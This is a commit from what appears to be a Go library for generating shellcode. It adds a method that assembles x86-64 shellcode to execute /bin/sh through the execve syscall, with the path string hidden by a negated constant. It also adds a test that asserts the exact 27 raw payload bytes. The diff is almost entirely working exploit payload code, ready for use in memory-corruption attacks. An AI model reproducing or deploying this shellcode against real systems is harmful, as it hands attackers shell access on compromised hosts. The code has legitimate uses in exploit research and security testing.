x86-64 exec /bin/sh shellcode

zznop · Dec 30, 2020 · 97dc9ec · 97dc9ec
1 parent 4ab386a
commit 97dc9ec
Show file tree

Hide file tree

Showing 2 changed files with 38 additions and 0 deletions.
diff --git a/shellcode/x8664.go b/shellcode/x8664.go
@@ -100,3 +100,23 @@ executable:
 	configured = append(configured, payload...)
 	return configured, nil
 }
+
+// LinuxShell is a method for JIT compiling x86-64 shellcode that executes /bin/sh
+func (x8664 *X8664) LinuxShell() ([]byte, error) {
+	instrs := `
+    xor eax, eax
+    mov rbx, 0xFF978CD091969DD1
+    neg rbx
+    push rbx
+    push rsp
+    pop rdi
+    cdq
+    push rdx
+    push rdi
+    push rsp
+    pop rsi
+    mov al, 0x3b
+    syscall
+`
+	return sp.Asm(x8664.arch, instrs)
+}
diff --git a/shellcode/x8664_test.go b/shellcode/x8664_test.go
@@ -1,6 +1,7 @@
 package shellcode
 
 import (
+	"bytes"
 	"testing"
 )
 
@@ -21,3 +22,20 @@ echo "Hello from memfd_create exec sploit shellcode" > ./success.txt
 		t.Fatal("Shellcode size != 263")
 	}
 }
+
+func TestX8664LinuxShell(t *testing.T) {
+	x8664 := NewX8664()
+	shellcode, err := x8664.LinuxShell()
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	scBytes := []byte{0x31, 0xc0, 0x48, 0xbb, 0xd1, 0x9d, 0x96, 0x91,
+		0xd0, 0x8c, 0x97, 0xff, 0x48, 0xf7, 0xdb, 0x53,
+		0x54, 0x5f, 0x99, 0x52, 0x57, 0x54, 0x5e, 0xb0,
+		0x3b, 0x0f, 0x05}
+
+	if bytes.Compare(shellcode, scBytes) != 0 {
+		t.Fatal("Shellcode bytes != expected")
+	}
+}